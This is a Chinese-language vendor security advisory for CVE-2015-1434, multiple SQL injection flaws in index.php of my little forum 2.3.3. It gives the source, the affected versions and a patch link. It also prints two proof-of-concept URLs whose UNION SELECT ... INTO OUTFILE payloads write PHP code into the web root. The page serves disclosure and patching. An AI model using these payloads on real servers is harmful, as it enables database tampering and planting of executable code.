my little forum \'index.php\'多个sql注入漏洞

当前位置：首页 > 服务与支持 > 产品升级公告 > 安全漏洞公告

服务与支持Support

my little forum \'index.php\'多个sql注入漏洞

发表日期：2015-02-26 10:23:08

my little forum \'index.php\'多个sql注入漏洞
BugTraq-ID:72575
CVE-ID:CVE-2015-1434
发布日期：2015-02-11
更新日期：2015-02-12
受影响系统：
my little forum my little forum 2.3.3
my little forum my little forum
详细信息：

my little forum是简单的基于PHP及MySQL的互联网论坛。

my little forum 2.3.3及其他版本在index.php的实现上存在多个sql注入漏洞，攻击者可利用这些漏洞执行未授权数据库操作。

来源：
High-Tech Bridge Security Research
测试方法：
警告以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！http://www.example.com/index.php?mode=admin&amp;action=user&amp;letter=&amp;apos; UNION SELECT \'&lt;? phpcode() ?&gt;\' INTO OUTFILE \'/var/www/file.php\'

http://www.example.com/index.php?mode=admin&amp;edit_category=&amp;apos; UNION SELECT 1,2,3,\'&lt;? phpinfo() ?&gt;\' INTO OUTFILE \'/var/www/file.php\' --
解决办法：
厂商补丁：

my little forum
---------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://mylittleforum.net/

服务与支持Support

■服务概述

■在线激活

■产品升级公告

■在线服务

■资料下载

my little forum \'index.php\'多个sql注入漏洞